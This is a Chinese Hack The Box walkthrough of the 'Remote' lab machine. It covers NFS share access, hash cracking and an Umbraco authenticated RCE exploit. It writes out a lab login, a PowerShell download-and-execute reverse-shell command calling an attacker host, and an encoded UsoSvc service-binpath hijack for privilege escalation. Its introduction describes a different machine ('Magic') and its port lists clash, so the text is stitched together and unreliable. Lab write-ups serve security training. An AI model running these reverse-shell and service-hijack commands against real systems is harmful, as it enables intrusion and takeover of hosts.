2022年7月5日22:35:15评论53 views字数 1950阅读6分30秒阅读模式

靶机介绍：

Magic有两个常见步骤，一个SQLI来绕过登录，一个webshell上传，带有双扩展名来绕过过滤。从那里，我可以获得一个shell，并在数据库中查找凭证，然后切换到user。为了获得根目录，有一个二进制文件在没有完整路径的情况下调用popen，这使它容易受到路径劫持攻击。在Beyond Root中，我将查看导致执行. PHP .png文件的Apache配置、过滤上传的PHP代码以及suid二进制文件的源代码。

信息收集：

1.首先使用nmap进行端口扫描。发现开启了135，5985、139、80端口。

HTB:remote渗透测试

2. 利用nmap进行深度扫描，发现FTP，SMB，HTTP和NFS服务正在运行。

HTB:remote渗透测试

3.查看web页面。

HTB:remote渗透测试

4.发现都存在umbraco这个词。在页面底端也发现了这个词。

HTB:remote渗透测试

5、通过搜索引擎搜索，发现其为一个cms。

HTB:remote渗透测试

通过目录扫描，发现存在/umbraco这个目录。

HTB:remote渗透测试

6.之前使用nmap深度扫描，发现其存在NFS服务。

HTB:remote渗透测试 7、然后使用showmount查看目标主机NFS共享的文件夹，发现存在可访问的/site_backups文件夹，然后将其挂载到本地。

HTB:remote渗透测试

8、查看site_backups文件夹中的信息，

HTB:remote渗透测试

在APP_Data目录下发现了sdf数据库文件信息，然后利用strings枚举该文件。

HTB:remote渗透测试

发现存在经过SHA1和HMACSHA256算法生成的hash值。然后使用hashcat进行解密。

HTB:remote渗透测试

使用find命令，搜索到了用户的邮箱。

HTB:remote渗透测试

9、使用邮箱账户和解密出来的密码进行登录。发现其是7.12.4版本。

HTB:remote渗透测试

漏洞利用：

1、然后就使用searchsplit搜索可用的EXP。

HTB:remote渗透测试

2、然后对其进行修改。添加邮箱和密码。

HTB:remote渗透测试

使用nishang进行反弹shell，在文件最底下加上Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.3 -Port 4444.

HTB:remote渗透测试

3、然后执行命令。

python3 exploit.py -u [email protected] -p baconandcheese -i http://10.10.10.180 -c powershell.exe -a "iex(new-object net.webclient).downloadstring('http://10.10.16.3/Invoke-PowerShellTcp.ps1')"

HTB:remote渗透测试

4、在nishang文件下，开启http服务。

HTB:remote渗透测试

5、使用nc监听4444端口，成功反弹shell。

HTB:remote渗透测试

然后进入Users目录下。

HTB:remote渗透测试

6、发现存在public目录，使用dir查看存在user.txt。成功找到第一个flag。

HTB:remote渗透测试

权限提升：

1.使用systeminfo查看主机信息。

HTB:remote渗透测试

2.使用whoami/priv 查看当前用户权限。

HTB:remote渗透测试

3. 使用sc命令枚举存在缺陷的服务，发现UsoSvc服务可以被当前用户控制。

HTB:remote渗透测试

4. 使用echo "IEX( IWR http://10.10.16.3/Invoke-PowerShellTcp.ps1 -UseBasicParsing)" | iconv -t utf-16le|base64 -w 0，来生成poc。

HTB:remote渗透测试

5使用sc.exe config UsoSvc binpath= "cmd.exe /c powershell.exe -EncodedCommand SQBFAFgAKAAgAEkAVwBSACAAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADYALgAzAC8ASQBuAHYAbwBrAGUALQBQAG8AdwBlAHIAUwBoAGUAbABsAFQAYwBwAC4AcABzADEAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACkACgA="。来弹shell。

HTB:remote渗透测试

6.继续使用nc监听4444端口。成功反弹shell。

HTB:remote渗透测试

7.到了最后就是找flag的环节，先进入user目录下，找到了Administrator目录。接着进入Desktop，查看root.txt。成功找到最后一个靶标。

HTB:remote渗透测试

总结：

接着就做一个总结：首先利用nmap进行扫描端口，然后对其进行深度扫描。发现其开启了NFS服务，然后就共享文件夹挂载到本地。在访问主页，发现是国外的cms。然后使用gobuster爆破后台地址。使用共享文件夹中的邮箱用户和hashcat枚举出的密码，进行登录。接着发现cms版本信息。使用searchsploit搜索exp，发现存在一个可用的exp。修改exp，然后利用它得到一个低权限的shell。接下来发现sc命令存在缺陷，利用sc成功进行提权。靶机的大致过程就是这些了。还有一些别的提权思路，有机会在尝试一下别的思路。

喜欢本文就给我点个赞吧！

原文始发于微信公众号（亿人安全）：HTB:remote渗透测试

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

HTB:remote渗透测试

靶机介绍：

信息收集：

漏洞利用：

权限提升：

总结：

Clash Verge rev提权与命令执行分析

【实战】手把手学习写一个MCP服务，获取热榜文章

借助pikachu和DVWA靶场带你走进跨站请求伪造CSRF攻击

揭露导致组织论坛崩溃的简单错误

深度学习基础架构革新？通过梯度近似寻找Normalization的替代品

栈溢出从复现到挖掘-CVE-2018-18708漏洞复现详解

windows rookit防护-权限提升

通过手机和邮箱查真实姓名-币安

常见的信息泄露漏洞挖掘（第二部分）

实战中踩过的坑：我是如何用Ingram搞定摄像头漏洞扫描的

发表评论

在线咨询

微信